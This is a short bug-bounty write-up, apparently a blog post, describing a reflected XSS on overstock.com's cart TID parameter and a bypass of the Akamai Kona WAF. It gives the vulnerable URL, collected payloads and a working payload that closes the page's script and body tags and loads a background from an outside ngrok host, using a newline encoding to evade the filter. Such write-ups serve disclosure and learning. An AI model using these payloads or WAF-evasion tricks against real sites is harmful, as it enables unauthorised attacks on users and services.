How i bypassed AKAMAI KONA WAF , XSS in overstock.com !

This target is available on bugcrowd program and this target as my research about xss (Cross site scripting) and i research this for learning about how the WAF work.

endpoint i found is using google dork ( use your brain ). and i came with this vulnerable URL

https://www.overstock.com/cart?TID=INJECTED_XSS

and this target is protected with

AKAMAI KONA WAF + XSS HEADER PROTECTION

first i check where the reflected of our script with view-source

we can see “crot” reflected to that ( i dont know about that array or fucking object ) now i try to use “</script></body>” to escape <script> and <body> in overstock.

yay… !!! our payload success to escape that.

every payload i search about bypass “AKAMAI WAF” :

  • in twitter post

@zseano

https://twitter.com/xsspayloads/status/1008573444840198144?lang=en

@brutelogic

https://twitter.com/brutelogic/status/586284524247584769

  • in github post Ed
\');confirm(1);//
  • in hackerone

and all the tips i try , i still cant bypass the Akamai WAF using that. and now i try to research alone :( to inserted my xss host ( i use ngrok.io ) for LISTEN response to my host and as example i using “w3schools tryiteditor” to test BODY TAG HTML to insert my xss host

and i try to use payload

<body background=”ngrok.io/overstock”>

see my ngrok host is get a response from w3school page request

NOW TIME FOR BYPASS WAF AKAMAI KONA in OVERSTOCK

with my payload

“ </script></body><body%20background=%27https://dfc26b38.ngrok.io/overstock%27%0a> “

why i use “%0a” in end of tag is because the waf still blocked my payload with ending “>” and because that i add “\n” => (convert to urlencode)

response from my ngrok.io

XSS SUCCESS !

Follow my twitter

https://twitter.com/0ktavandi